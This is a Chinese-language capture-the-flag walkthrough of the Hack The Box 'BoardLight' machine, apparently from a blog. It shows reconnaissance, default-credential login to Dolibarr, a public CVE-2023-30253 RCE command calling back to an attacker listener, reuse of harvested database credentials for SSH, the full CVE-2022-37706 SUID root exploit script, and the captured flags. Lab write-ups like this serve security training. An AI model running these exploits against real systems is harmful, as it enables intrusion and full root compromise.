信息收集

IP Address	Opening Ports
10.10.11.11	TCP:22,80

$ nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8221/tcp  filtered unknown
9564/tcp  filtered unknown
19285/tcp filtered unknown
19837/tcp filtered unknown
20734/tcp filtered unknown
24875/tcp filtered unknown
26918/tcp filtered unknown
36270/tcp filtered unknown
36538/tcp filtered unknown
38225/tcp filtered unknown
40483/tcp filtered unknown
53279/tcp filtered unknown
56489/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP && 子域名挖掘

$ whatweb 10.10.11.11

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图

# sudo echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图1

$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图2

# sudo echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

http://crm.board.htb/

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图3

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图4

username:admin password:admin

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图5

https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图6

$ python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图7

www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图8

username:dolibarrowner
password:serverfun2$2023!!

$ ssh [email protected]

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图9

User.txt

b7f82dc5b4ed058a7ea007f02cafde10

权限提升

larissa@boardlight:/tmp$ find / -perm -4000 -type f 2>/dev/null

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图10

https://www.exploit-db.com/exploits/51180

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图11

#!/bin/bash

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

larissa@boardlight:/tmp$ chmod +x exp.sh

larissa@boardlight:/tmp$ bash exp.sh

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…插图12

Root.txt

f1844b04972e657f7e59544e69e23c20

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…

信息收集

HTTP && 子域名挖掘

User.txt

权限提升

Root.txt

相关文章

发布评论取消回复

[Meachines] [Easy] BoardLight Dolibarr17.0.0-RCE+E…

信息收集

HTTP && 子域名挖掘

User.txt

权限提升

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复